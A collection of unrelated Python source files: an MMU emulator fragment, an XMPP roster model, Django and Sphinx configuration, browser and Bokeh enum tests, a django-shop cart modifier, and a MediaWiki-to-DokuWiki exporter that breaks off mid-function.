>>> m.getRaw(0x100)
255
>>> m.getRaw(0x1)
123
>>> u.getRaw(0x6001)
123
>>> u.getRaw(0x6000)
0
"""
if self._enabled:
return self._mem.getRaw(self.virtToPhys(pos))
else:
return self._mem.getRaw(pos)
class Flags:
def __init__(self, flags=0, solved=None):
""" Initialize flags
"""
self._flags = flags
if solved is None:
self._data = self.solveFlags(flags)
else:
self._data = solved
def solveFlags(self, flags):
""" Solve flags from given number data
>>> f = MMU.Flags()
>>> r = f.solveFlags(0x1)
>>> f
execute=False,ok=False,size=4096,size1=False,size2=False,subtable=True,userspace=False,write=False
>>> r = f.solveFlags(0x2)
>>> f
execute=True,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x4)
>>> f
execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=True
>>> r = f.solveFlags(0x8)
>>> f
execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=True,write=False
>>> r = f.solveFlags(0x10)
>>> f
execute=False,ok=False,size=64,size1=True,size2=False,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x20)
>>> f
execute=False,ok=False,size=1024,size1=False,size2=True,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x30)
>>> f
execute=False,ok=False,size=65536,size1=True,size2=True,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0x40)
>>> f
execute=False,ok=False,size=4,size1=False,size2=False,subtable=False,userspace=False,write=False
>>> r = f.solveFlags(0xFF)
>>> f
execute=True,ok=False,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True
>>> r = f.solveFlags(0x1FF)
>>> f
execute=True,ok=True,size=67108864,size1=True,size2=True,subtable=True,userspace=True,write=True
"""
data = {
'subtable': False,
'execute': False,
'write': False,
'userspace': False,
'size': 0,
'size1': False,
'size2': False,
'ok': False,
}
#'size3': False,
if flags & 0x1 == 0x1:
data['subtable'] = True
if flags & 0x2 == 0x2:
data['execute'] = True
if flags & 0x4 == 0x4:
data['write'] = True
if flags & 0x8 == 0x8:
data['userspace'] = True
if flags & 0x10 == 0x10:
data['size1'] = True
if flags & 0x20 == 0x20:
data['size2'] = True
if flags & 0x100 == 0x100:
data['ok'] = True
# Determine page size in kilobytes
if not data['size1'] and not data['size2']:
data['size'] = 4
elif data['size1'] and not data['size2']:
data['size'] = 64
elif not data['size1'] and data['size2']:
data['size'] = 1024
elif data['size1'] and data['size2']:
data['size'] = 1024 * 64
# For subtables multiply by 1024
if data['subtable']:
data['size'] *= 1024
self._data = data
return data
def isSet(self, name):
""" Checks whether element is set, or get value
>>> f = MMU.Flags(0x1F)
>>> f.isSet('size')
65536
>>> f.isSet('size1')
True
>>> f.isSet('size2')
False
>>> f.isSet('subtable')
True
"""
if not name in self._data:
return False
return self._data[name]
def __getitem__(self, name):
if not name in self._data:
return None
return self._data[name]
def dump(self):
""" Dumps the flag status
"""
return self._data
def __repr__(self):
""" Get string representation of the flags
"""
#return "%s" % self.dump()
a = self._data.keys()
res = ''
for k in sorted(a):
if res:
res += ','
res += '%s=%s' % (k, self._data[k])
return res
"""
MMU
Initial table
if __name__ == "__main__":
import doctest
doctest.run_docstring_examples(MMU.initialize, globals())
"""
|
"""
pyfire.contact
~~~~~~~~~~
Handles Contact ("roster item") interpretation as per RFC-6121
:copyright: 2011 by the pyfire Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import xml.etree.ElementTree as ET
from sqlalchemy import Table, Column, Boolean, Integer, String, Enum, ForeignKey
from sqlalchemy.orm import relationship, backref
from pyfire.jid import JID
from pyfire.storage import Base, JIDString
contacts_groups = Table('contacts_groups', Base.metadata,
Column('contact_id', Integer, ForeignKey('contacts.id')),
Column('group_id', Integer, ForeignKey('groups.id'))
)
class Roster(Base):
"""List of contacts for a given jid"""
__tablename__ = 'rosters'
id = Column(Integer, primary_key=True)
jid = Column(JIDString, nullable=False)
def __init__(self, jid):
self.jid = JID(jid)
class Group(Base):
"""Simple group, only providing a name for now"""
__tablename__ = 'groups'
id = Column(Integer, primary_key=True)
name = Column(String(255))
class Contact(Base):
"""Jabber Contact, aka roster item. It has some really strict attribute
setting mechanism as it leads to all kinds of fantastic crashes with
clients which should be avoided in any case.
"""
__tablename__ = 'contacts'
id = Column(Integer, primary_key=True)
approved = Column(Boolean)
ask = Column(Enum('subscribe'))
jid = Column(JIDString, nullable=False)
name = Column(String(255))
subscription = Column(Enum("none", "from", "to", "remove", "both"))
groups = relationship(Group, secondary=contacts_groups)
roster = relationship(Roster, backref=backref('contacts'))
roster_id = Column(Integer, ForeignKey('rosters.id'), nullable=False)
def __init__(self, jid, **kwds):
super(Contact, self).__init__()
# required
if isinstance(jid, basestring):
self.jid = JID(jid)
elif isinstance(jid, JID):
self.jid = jid
self.jid.validate(raise_error=True)
else:
raise AttributeError("Needs valid jid either as string or JID instance")
# optional
self.approved = False
self.ask = None
self.name = None
self.subscription = "none"
self.groups = []
for k, v in kwds.iteritems():
setattr(self, k, v)
def to_element(self):
"""Formats contact as `class`:ET.Element object"""
element = ET.Element("item")
if self.approved is not None:
element.set("approved", 'true' if self.approved else 'false')
if self.ask is not None:
element.set("ask", self.ask)
element.set("jid", str(self.jid))
if self.name is not None:
element.set("name", self.name)
if self.subscription is not None:
element.set("subscription", self.subscription)
for group in self.groups:
group_element = ET.SubElement(element, "group")
group_element.text = group
return element
@staticmethod
def from_element(element):
"""Creates contact instance from `class`:ET.Element"""
if element.tag != "item":
raise ValueError("Invalid element with tag %s" % element.tag)
cont = Contact(element.get('jid'))
cont.ask = element.get('ask')
cont.subscription = element.get('subscription')
approved = element.get('approved')
if approved == 'true':
cont.approved = True
elif approved == 'false':
cont.approved = False
else:
cont.approved = approved
for group in list(element):
if group.tag == "group":
cont.groups.append(group.text)
return cont
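# Usage sketch (illustrative JID and group name): round-trip a contact
# through its XML wire representation.
#   cont = Contact("alice@example.com", name="Alice", groups=["friends"])
#   xml = ET.tostring(cont.to_element())
#   clone = Contact.from_element(ET.fromstring(xml))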
|
import sys, os
import datetime
extensions = ['sphinx.ext.autodoc']
templates_path = ['_templates']
source_suffix = '.rst'
master_doc = 'index'
project = u'example_project'
copyright = u'%d, Lincoln Loop' % datetime.date.today().year
version = '1.0'
release = '1.0'
exclude_trees = ['_build']
pygments_style = 'sphinx'
html_theme = 'default'
html_static_path = ['_static']
htmlhelp_basename = 'example_projectdoc'
latex_documents = [
('index', 'example_project.tex', u'example_project Documentation',
u'Lincoln Loop', 'manual'),
]
|
import os
import unittest
import sys
from splinter import Browser
from .base import BaseBrowserTests
from .fake_webapp import EXAMPLE_APP
from .is_element_present_nojs import IsElementPresentNoJSTest
@unittest.skipIf(
sys.version_info[0] > 2,
"zope.testbrowser is not currently compatible with Python 3",
)
class ZopeTestBrowserDriverTest(
BaseBrowserTests, IsElementPresentNoJSTest, unittest.TestCase
):
@classmethod
def setUpClass(cls):
cls.browser = Browser("zope.testbrowser", wait_time=0.1)
def setUp(self):
self.browser.visit(EXAMPLE_APP)
    @classmethod
    def tearDownClass(cls):
        cls.browser.quit()
def test_should_support_with_statement(self):
with Browser("zope.testbrowser"):
pass
def test_attach_file(self):
"should provide a way to change file field value"
file_path = os.path.join(
os.path.abspath(os.path.dirname(__file__)), "mockfile.txt"
)
self.browser.attach_file("file", file_path)
self.browser.find_by_name("upload").click()
html = self.browser.html
self.assertIn("text/plain", html)
self.assertIn(open(file_path).read().encode("utf-8"), html)
def test_forward_to_none_page(self):
"should not fail when trying to forward to none"
browser = Browser("zope.testbrowser")
browser.visit(EXAMPLE_APP)
browser.forward()
self.assertEqual(EXAMPLE_APP, browser.url)
browser.quit()
def test_cant_switch_to_frame(self):
"zope.testbrowser should not be able to switch to frames"
with self.assertRaises(NotImplementedError) as cm:
self.browser.get_iframe("frame_123")
self.fail()
e = cm.exception
self.assertEqual("zope.testbrowser doesn't support frames.", e.args[0])
def test_simple_type(self):
"""
zope.testbrowser won't support type method
because it doesn't interact with JavaScript
"""
with self.assertRaises(NotImplementedError):
self.browser.type("query", "with type method")
def test_simple_type_on_element(self):
"""
zope.testbrowser won't support type method
because it doesn't interact with JavaScript
"""
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("query").type("with type method")
def test_can_clear_password_field_content(self):
"zope.testbrowser should not be able to clear"
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("password").first.clear()
def test_can_clear_tel_field_content(self):
"zope.testbrowser should not be able to clear"
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("telephone").first.clear()
def test_can_clear_text_field_content(self):
"zope.testbrowser should not be able to clear"
with self.assertRaises(NotImplementedError):
self.browser.find_by_name("query").first.clear()
def test_slowly_typing(self):
"""
zope.testbrowser won't support type method
because it doesn't interact with JavaScript
"""
with self.assertRaises(NotImplementedError):
self.browser.type("query", "with type method", slowly=True)
def test_slowly_typing_on_element(self):
"""
zope.testbrowser won't support type method
        on element because it doesn't interact with JavaScript
"""
with self.assertRaises(NotImplementedError):
query = self.browser.find_by_name("query")
query.type("with type method", slowly=True)
def test_cant_mouseover(self):
"zope.testbrowser should not be able to put the mouse over the element"
with self.assertRaises(NotImplementedError):
self.browser.find_by_css("#visible").mouse_over()
def test_cant_mouseout(self):
"zope.testbrowser should not be able to mouse out of an element"
with self.assertRaises(NotImplementedError):
self.browser.find_by_css("#visible").mouse_out()
def test_links_with_nested_tags_xpath(self):
links = self.browser.find_by_xpath('//a/span[text()="first bar"]/..')
self.assertEqual(
len(links),
1,
            'Expected exactly one link with a span with text "first bar". %s'
            % (map(lambda item: item.outer_html, links)),
)
def test_finding_all_links_by_non_ascii_text(self):
"should find links by non ascii text"
non_ascii_encodings = {
"pangram_pl": u"Jeżu klątw, spłódź Finom część gry hańb!",
"pangram_ja": u"天 地 星 空",
"pangram_ru": u"В чащах юга жил бы цитрус? Да, но фальшивый экземпляр!",
"pangram_eo": u"Laŭ Ludoviko Zamenhof bongustas freŝa ĉeĥa manĝaĵo kun spicoj.",
}
for key, text in non_ascii_encodings.iteritems():
link = self.browser.find_link_by_text(text)
self.assertEqual(key, link["id"])
|
from decimal import Decimal
from shop.cart.cart_modifiers_base import BaseCartModifier
class TextOptionsOptionsCartModifier(BaseCartModifier):
'''
This modifier adds an extra field to the cart to let the lineitem "know"
about product options and their respective price.
'''
def process_cart_item(self, cart_item, state):
'''
This adds a list of price modifiers depending on the product options
the client selected for the current cart_item (if any)
'''
# process text_options as passed through the variation object
if cart_item.variation.has_key('text_options'):
for value in cart_item.variation['text_options'].itervalues():
label = value['name'] + ': ' + value['text']
price = Decimal(value['price']) * len(value['text']) * cart_item.quantity
# Don't forget to update the running total!
cart_item.current_total += price
cart_item.extra_price_fields.append((label, price))
return cart_item
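# --- Hedged illustration, not part of django-shop ---
# A minimal stand-in cart item showing how process_cart_item accumulates the
# extra price fields. The option name, text and unit price are invented, and
# it is assumed that BaseCartModifier can be instantiated without arguments.
if __name__ == '__main__':
    class _FakeCartItem(object):
        def __init__(self):
            self.quantity = 2
            self.current_total = Decimal('10.00')
            self.extra_price_fields = []
            self.variation = {'text_options': {
                'engraving': {'name': 'Engraving', 'text': 'Hi', 'price': '0.50'},
            }}
    item = TextOptionsOptionsCartModifier().process_cart_item(_FakeCartItem(), None)
    print(item.extra_price_fields)  # [('Engraving: Hi', Decimal('2.00'))]
    print(item.current_total)       # 10.00 + 0.50/char * 2 chars * 2 items = 12.00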
|
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
('My Name', 'your_email@domain.com'),
)
MANAGERS = ADMINS
import tempfile, os
from django import contrib
tempdata = tempfile.mkdtemp()
approot = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
adminroot = os.path.join(contrib.__path__[0], 'admin')
DATABASES = {
'default': {
'NAME': os.path.join(tempdata, 'signalqueue-test.db'),
'TEST_NAME': os.path.join(tempdata, 'signalqueue-test.db'),
'ENGINE': 'django.db.backends.sqlite3',
'USER': '',
'PASSWORD': '',
}
}
TIME_ZONE = 'America/New_York'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
MEDIA_ROOT = os.path.join(approot, 'static')
MEDIA_URL = '/face/'
STATIC_ROOT = os.path.join(adminroot, 'static', 'admin')
STATIC_URL = '/staticfiles/'
ADMIN_MEDIA_PREFIX = '/admin-media/'
ROOT_URLCONF = 'signalqueue.settings.urlconf'
TEMPLATE_DIRS = (
os.path.join(approot, 'templates'),
os.path.join(adminroot, 'templates'),
os.path.join(adminroot, 'templates', 'admin'),
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.gzip.GZipMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
)
TEMPLATE_CONTEXT_PROCESSORS = (
"django.contrib.auth.context_processors.auth",
"django.core.context_processors.request",
"django.core.context_processors.debug",
#"django.core.context_processors.i18n", this is AMERICA
"django.core.context_processors.media",
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.staticfiles',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.admin',
'django_nose',
'djcelery',
'delegate',
'signalqueue',
)
LOGGING = dict(
version=1,
disable_existing_loggers=False,
formatters={ 'standard': { 'format': '%(asctime)s [%(levelname)s] %(name)s: %(message)s' }, },
handlers={
'default': { 'level':'DEBUG', 'class':'logging.StreamHandler', 'formatter':'standard', },
'nil': { 'level':'DEBUG', 'class':'django.utils.log.NullHandler', },
},
loggers={
'signalqueue': { 'handlers': ['default'], 'level': 'INFO', 'propagate': False },
},
root={ 'handlers': ['default'], 'level': 'INFO', 'propagate': False },
)
SQ_QUEUES = {
'default': { # you need at least one dict named 'default' in SQ_QUEUES
'ENGINE': 'signalqueue.worker.backends.RedisSetQueue', # required - full path to a QueueBase subclass
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(port=8356),
},
'listqueue': {
'ENGINE': 'signalqueue.worker.backends.RedisQueue',
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(port=8356),
},
'db': {
'ENGINE': 'signalqueue.worker.backends.DatabaseQueueProxy',
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(app_label='signalqueue',
modl_name='EnqueuedSignal'),
},
'celery': {
'ENGINE': 'signalqueue.worker.celeryqueue.CeleryQueue',
'INTERVAL': 30, # 1/3 sec
'OPTIONS': dict(celery_queue_name='inactive',
transport='redis', port=8356),
},
}
SQ_ADDITIONAL_SIGNALS=['signalqueue.tests']
SQ_WORKER_PORT = 11201
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
try:
from kombu import Queue
except ImportError:
pass
else:
CELERY_DEFAULT_QUEUE = 'default'
CELERY_DEFAULT_ROUTING_KEY = 'default'
CELERY_DEFAULT_EXCHANGE_TYPE = 'direct'
CELERY_QUEUES = (
Queue('default', routing_key='default.#'),
Queue('yodogg', routing_key='yodogg.#'),
)
CELERY_ALWAYS_EAGER = True
BROKER_URL = 'redis://localhost:8356/0'
BROKER_HOST = "localhost"
BROKER_BACKEND = "redis"
REDIS_PORT = 8356
REDIS_HOST = "localhost"
BROKER_USER = ""
BROKER_PASSWORD = ""
BROKER_VHOST = "0"
REDIS_DB = 0
REDIS_CONNECT_RETRY = True
CELERY_SEND_EVENTS = True
CELERY_RESULT_BACKEND = "redis://localhost:8356/0"
CELERY_TASK_RESULT_EXPIRES = 10
CELERYBEAT_SCHEDULER = "djcelery.schedulers.DatabaseScheduler"
try:
import djcelery
except ImportError:
pass
else:
djcelery.setup_loader()
from pkgutil import extend_path
__path__ = extend_path(__path__, __name__)
|
from setuptools import setup
setup(
name='pfile-tools',
version='0.5.0',
author='Nathan Vack',
author_email='njvack@wisc.edu',
license='BSD License',
url='https://github.com/njvack/pfile-tools',
packages=['pfile_tools'],
entry_points={
'console_scripts': [
'dump_pfile_header = pfile_tools.scripts.dump_pfile_header:main',
'anonymize_pfile = pfile_tools.scripts.anonymize_pfile:main'
]}
)
|
from __future__ import absolute_import, division, print_function, unicode_literals
import pytest ; pytest
from bokeh.colors import named
from bokeh.palettes import __palettes__
import bokeh.core.enums as bce
def test_Enumeration_default():
e = bce.Enumeration()
assert e.__slots__ == ()
class Test_enumeration(object):
def test_basic(self):
e = bce.enumeration("foo", "bar", "baz")
assert isinstance(e, bce.Enumeration)
assert str(e) == "Enumeration(foo, bar, baz)"
assert [x for x in e] == ["foo", "bar", "baz"]
for x in ["foo", "bar", "baz"]:
assert x in e
assert "junk" not in e
def test_case(self):
e = bce.enumeration("foo", "bar", "baz", case_sensitive=False)
assert isinstance(e, bce.Enumeration)
assert str(e) == "Enumeration(foo, bar, baz)"
assert [x for x in e] == ["foo", "bar", "baz"]
for x in ["foo", "FOO", "bar", "bAr", "baz", "BAZ"]:
assert x in e
assert "junk" not in e
def test_default(self):
# this is private but used by properties
e = bce.enumeration("foo", "bar", "baz")
assert e._default == "foo"
def test_len(self):
e = bce.enumeration("foo", "bar", "baz")
assert len(e) == 3
class Test_bce(object):
def test_Anchor(self):
assert tuple(bce.Anchor) == (
"top_left", "top_center", "top_right",
"center_left", "center", "center_right",
"bottom_left", "bottom_center", "bottom_right"
)
def test_AngleUnits(self):
assert tuple(bce.AngleUnits) == ('deg', 'rad')
def test_ButtonType(self):
assert tuple(bce.ButtonType) == ("default", "primary", "success", "warning", "danger")
def test_DashPattern(self):
        assert tuple(bce.DashPattern) == ("solid", "dashed", "dotted", "dotdash", "dashdot")
def test_DateFormat(self):
assert tuple(bce.DateFormat) == ("ATOM", "W3C", "RFC-3339", "ISO-8601", "COOKIE", "RFC-822",
"RFC-850", "RFC-1036", "RFC-1123", "RFC-2822", "RSS", "TIMESTAMP")
def test_DatetimeUnits(self):
assert tuple(bce.DatetimeUnits) == ("microseconds", "milliseconds", "seconds", "minsec",
"minutes", "hourmin", "hours", "days", "months", "years")
def test_Dimension(self):
assert tuple(bce.Dimension) == ("width", "height")
def test_Dimensions(self):
assert tuple(bce.Dimensions) == ("width", "height", "both")
def test_Direction(self):
assert tuple(bce.Direction) == ("clock", "anticlock")
def test_FontStyle(self):
assert tuple(bce.FontStyle) == ('normal', 'italic', 'bold', 'bold italic')
def test_HoldPolicy(self):
assert tuple(bce.HoldPolicy) == ("combine", "collect")
def test_HorizontalLocation(self):
assert tuple(bce.HorizontalLocation) == ("left", "right")
def test_JitterRandomDistribution(self):
assert tuple(bce.JitterRandomDistribution) == ("uniform", "normal")
def test_LatLon(self):
assert tuple(bce.LatLon) == ("lat", "lon")
def test_LegendClickPolicy(self):
assert tuple(bce.LegendClickPolicy) == ("none", "hide", "mute")
def test_LegendLocation(self):
assert tuple(bce.LegendLocation) == (
"top_left", "top_center", "top_right",
"center_left", "center", "center_right",
"bottom_left", "bottom_center", "bottom_right"
)
def test_LineCap(self):
assert tuple(bce.LineCap) == ("butt", "round", "square")
def test_LineDash(self):
assert tuple(bce.LineDash) == ("solid", "dashed", "dotted", "dotdash", "dashdot")
def test_LineJoin(self):
assert tuple(bce.LineJoin) == ("miter", "round", "bevel")
def test_Location(self):
assert tuple(bce.Location) == ("above", "below", "left", "right")
def test_MapType(self):
assert tuple(bce.MapType) == ("satellite", "roadmap", "terrain", "hybrid")
def test_MarkerType(self):
assert tuple(bce.MarkerType) == ("asterisk", "circle", "circle_cross", "circle_x", "cross",
"dash", "diamond", "diamond_cross", "hex", "inverted_triangle",
"square", "square_cross", "square_x", "triangle", "x")
def test_NamedColor(self):
assert len(tuple(bce.NamedColor)) == 147
assert tuple(bce.NamedColor) == tuple(named.__all__)
def test_NumeralLanguage(self):
assert tuple(bce.NumeralLanguage) == ("be-nl", "chs", "cs", "da-dk", "de-ch", "de", "en",
"en-gb", "es-ES", "es", "et", "fi", "fr-CA", "fr-ch",
"fr", "hu", "it", "ja", "nl-nl", "pl", "pt-br",
"pt-pt", "ru", "ru-UA", "sk", "th", "tr", "uk-UA")
def test_Orientation(self):
assert tuple(bce.Orientation) == ("horizontal", "vertical")
def test_OutputBackend(self):
assert tuple(bce.OutputBackend) == ("canvas", "svg", "webgl")
def test_PaddingUnits(self):
assert tuple(bce.PaddingUnits) == ("percent", "absolute")
def test_Palette(self):
assert tuple(bce.Palette) == tuple(__palettes__)
def test_RenderLevel(self):
assert tuple(bce.RenderLevel) == ("image", "underlay", "glyph", "annotation", "overlay")
def test_RenderMode(self):
assert tuple(bce.RenderMode) == ("canvas", "css")
def test_RoundingFunction(self):
assert tuple(bce.RoundingFunction) == ("round", "nearest", "floor", "rounddown", "ceil", "roundup")
def test_SizingMode(self):
assert tuple(bce.SizingMode) == ("stretch_width", "stretch_height", "stretch_both", "scale_width", "scale_height", "scale_both", "fixed")
def test_SliderCallbackPolicy(self):
assert tuple(bce.SliderCallbackPolicy) == ("continuous", "throttle", "mouseup")
def test_SortDirection(self):
assert tuple(bce.SortDirection) == ("ascending", "descending")
def test_SpatialUnits(self):
assert tuple(bce.SpatialUnits) == ("screen", "data")
def test_StartEnd(self):
assert tuple(bce.StartEnd) == ("start", "end")
def test_StepMode(self):
assert tuple(bce.StepMode) == ("before", "after", "center")
def test_TextAlign(self):
assert tuple(bce.TextAlign) == ("left", "right", "center")
def test_TextBaseline(self):
assert tuple(bce.TextBaseline) == ("top", "middle", "bottom", "alphabetic", "hanging", "ideographic")
def test_TickLabelOrientation(self):
assert tuple(bce.TickLabelOrientation) == ("horizontal", "vertical", "parallel", "normal")
def test_TooltipAttachment(self):
assert tuple(bce.TooltipAttachment) == ("horizontal", "vertical", "left", "right", "above", "below")
def test_TooltipFieldFormatter(self):
assert tuple(bce.TooltipFieldFormatter) == ("numeral", "datetime", "printf")
def test_VerticalAlign(self):
assert tuple(bce.VerticalAlign) == ("top", "middle", "bottom")
def test_VerticalLocation(self):
assert tuple(bce.VerticalLocation) == ("above", "below")
def test_enums_contents():
assert [x for x in dir(bce) if x[0].isupper()] == [
'Align',
'Anchor',
'AngleUnits',
'ButtonType',
'DashPattern',
'DateFormat',
'DatetimeUnits',
'Dimension',
'Dimensions',
'Direction',
'Enumeration',
'FontStyle',
'HoldPolicy',
'HorizontalLocation',
'JitterRandomDistribution',
'LatLon',
'LegendClickPolicy',
'LegendLocation',
'LineCap',
'LineDash',
'LineJoin',
'Location',
'MapType',
'MarkerType',
'NamedColor',
'NumeralLanguage',
'Orientation',
'OutputBackend',
'PaddingUnits',
'Palette',
'RenderLevel',
'RenderMode',
'RoundingFunction',
'SizingMode',
'SizingPolicy',
'SliderCallbackPolicy',
'SortDirection',
'SpatialUnits',
'StartEnd',
'StepMode',
'TextAlign',
'TextBaseline',
'TickLabelOrientation',
'TooltipAttachment',
'TooltipFieldFormatter',
'TrackPolicy',
'VerticalAlign',
'VerticalLocation',
]
|
"""
Methods for exporting mediawiki pages & images to a dokuwiki data/ directory.
Tested with Dokuwiki 2014-05-05 "Ponder Stibbons".
Copyright (C) 2014 Angus Gratton
Licensed under New BSD License as described in the file LICENSE.
"""
from __future__ import print_function, unicode_literals, absolute_import, division
import os, os.path, gzip, shutil, re, requests, calendar, codecs, sys
from requests.auth import HTTPBasicAuth
import wikicontent
import simplemediawiki
import names
class Exporter(object):
def __init__(self, rootpath):
# verify the dokuwiki rootpath exists
self.root = rootpath
if not os.path.isdir(rootpath):
raise RuntimeError("Dokuwiki root path '%s' does not point to a directory" % rootpath)
        # check a 'data' directory exists, establish paths for each subdirectory
self.data = os.path.join(rootpath, "data")
if not os.path.isdir(self.data):
raise RuntimeError("Dokuwiki root path '%s' does not contain a data directory" % rootpath)
# create meta, attic, pages subdirs if they don't exist (OK to have deleted them before the import)
self.meta = os.path.join(self.data, "meta")
self.attic = os.path.join(self.data, "attic")
self.pages = os.path.join(self.data, "pages")
for subdir in [ self.meta, self.attic, self.pages]:
ensure_directory_exists(subdir)
def write_pages(self, pages):
"""
Given 'pages' as a list of mediawiki pages with revisions attached, export them to dokuwiki pages
"""
for page in pages:
self._convert_page(page)
self._aggregate_changes(self.meta, "_dokuwiki.changes")
def write_images(self, images, file_namespace, http_user=None, http_pass=None):
"""
Given 'images' as a list of mediawiki image metadata API entries,
download and write out dokuwiki images. Does not bring over revisions.
Images are all written to the file_namespace specified (file: by default), to match mediawiki.
"""
        auth = None if http_user is None else HTTPBasicAuth(http_user, http_pass)
file_namespace = file_namespace.lower()
filedir = os.path.join(self.data, "media", file_namespace)
ensure_directory_exists(filedir)
filemeta = os.path.join(self.data, "media_meta", file_namespace)
ensure_directory_exists(filemeta)
for image in images:
# download the image from the Mediawiki server
print("Downloading %s..." % image['name'])
r = requests.get(image['url'], auth=auth)
# write the actual image out to the data/file directory
name = make_dokuwiki_pagename(image['name'])
imagepath = os.path.join(filedir, name)
with open(imagepath, "wb") as f:
f.write(r.content)
# set modification time appropriately
timestamp = get_timestamp(image)
os.utime(imagepath, (timestamp,timestamp))
# write a .changes file out to the media_meta/file directory
changepath = os.path.join(filemeta, "%s.changes" % name)
with codecs.open(changepath, "w", "utf-8") as f:
fields = (str(timestamp), "::1", "C", u"%s:%s"%(file_namespace,name), "", "created")
f.write(u"\t".join(fields) + "\r\n")
# aggregate all the new changes to the media_meta/_media.changes file
self._aggregate_changes(os.path.join(self.data, "media_meta"), "_media.changes")
def _convert_page(self, page):
""" Convert the supplied mediawiki page to a Dokuwiki page """
print("Converting %d revisions of page '%s'..." %
(len(page["revisions"]), page['title']))
# Sanitise the mediawiki pagename to something matching the dokuwiki pagename convention
full_title = make_dokuwiki_pagename(page['title'])
# Mediawiki pagenames can contain namespace :s, convert these to dokuwiki / paths on the filesystem (becoming : namespaces in dokuwiki)
subdir, pagename = os.path.split(full_title.replace(':','/'))
pagedir = os.path.join(self.pages, subdir)
metadir = os.path.join(self.meta, subdir)
atticdir = os.path.join(self.attic, subdir)
for d in pagedir, metadir, atticdir:
ensure_directory_exists(d)
# Walk through the list of revisions
revisions = list(reversed(page["revisions"])) # order as oldest first
for revision in revisions:
is_current = (revision == revisions[-1])
is_first = (revision == revisions[0])
content = wikicontent.convert_pagecontent(full_title, revision["*"])
timestamp = get_timestamp(revision)
comment = revision.get("comment", "").replace("\t", " ").split("\n")[0]
# path to the .changes metafile
changespath = os.path.join(metadir, "%s.changes"%pagename)
# for current revision, create 'pages' .txt
if is_current:
txtpath = os.path.join(pagedir, "%s.txt"%pagename)
with codecs.open(txtpath, "w", "utf-8") as f:
f.write(content)
os.utime(txtpath, (timestamp,timestamp))
# create gzipped attic revision
atticname = "%s.%s.txt.gz" % (pagename, timestamp)
atticpath = os.path.join(atticdir, atticname).encode("utf-8")
with gzip.open(atticpath, "wb") as f:
f.write(content.encode("utf-8"))
os.utime(atticpath, (timestamp,timestamp))
# append entry to page's 'changes' metadata index
with codecs.open(changespath, "w" if is_first else "a", "utf-8") as f:
changes_title = full_title.replace("/", ":")
fields = (str(timestamp), "::1", "C" if is_first else "E", changes_title, names.clean_user(revision["user"]), comment)
print(u"\t".join(fields), file=f)
def _aggregate_changes(self, metadir, aggregate):
"""
        Rebuild the wiki-wide changelog from meta/ to meta/_dokuwiki.changes or
from media_meta to media_meta/_media.changes
This is a Pythonified version of https://www.dokuwiki.org/tips:Recreate_Wiki_Change_Log
"""
lines = []
for root, dirs, files in os.walk(metadir):
for changesfile in files:
if changesfile == aggregate or not changesfile.endswith(".changes"):
continue
with codecs.open(os.path.join(root,changesfile), "r", "utf-8") as f:
lines += f.readlines()
lines = sorted(lines, key=lambda r: int(r.split("\t")[0]))
with codecs.open(os.path.join(metadir, aggregate), "w", "utf-8") as f:
f.writelines(lines)
def fixup_permissions(self):
""" Fix permissions under the data directory
This means applying the data directory's permissions and ownership to all underlying parts.
If this fails due to insufficient privileges then it just prints a warning and continues on.
"""
stat = os.stat(self.data)
try:
for root, dirs, files in os.walk(self.data):
for name in files:
path = os.path.join(root, name)
os.chmod(path, stat.st_mode & 0o666)
os.chown(path, stat.st_uid, stat.st_gid)
for name in dirs:
path = os.path.join(root, name)
os.chmod(path, stat.st_mode)
os.chown(path, stat.st_uid, stat.st_gid)
except OSError:
print("WARNING: Failed to set permissions under the data directory (not owned by process?) May need to be manually fixed.")
def invalidate_cache(self):
""" Invalidate cached pages by updating modification date of a config file
If this fails due to insufficient privileges then it just prints a warning and continues on.
"""
confpath = os.path.join(self.root, "conf", "local.php")
try:
            os.utime(confpath, None)
except OSError:
print(CACHE_WARNING_MSG % confpath)
CACHE_WARNING_MSG = """WARNING: Failed to invalidate page cache by updating config file timestamp.
If pre-existing pages exist in Dokuwiki, run the following command (with sufficient privileges):
touch "%s"
"""
def get_timestamp(node):
"""
    Return a dokuwiki-compatible Unix int timestamp for a mediawiki API page/image/revision
"""
dt = simplemediawiki.MediaWiki.parse_date(node['timestamp'])
return int(calendar.timegm(dt.utctimetuple()))
def ensure_directory_exists(path):
if not os.path.isdir(path):
os.makedirs(path)
def make_dokuwiki_pagename(mediawiki_name):
"""
Convert a canonical mediawiki pagename to a dokuwiki pagename
Any namespacing that is in the form of a / is replaced with a :
"""
result = mediawiki_name.replace(" ","_")
result = names.clean_id(camel_to_underscore(result)).replace("/",":")
result = codecs.encode(result, sys.getfilesystemencoding(), "replace")
return result
def make_dokuwiki_heading_id(mw_heading_name):
"""
Convert a Mediawiki internal anchor heading link to the Dokuwiki anchor heading link id
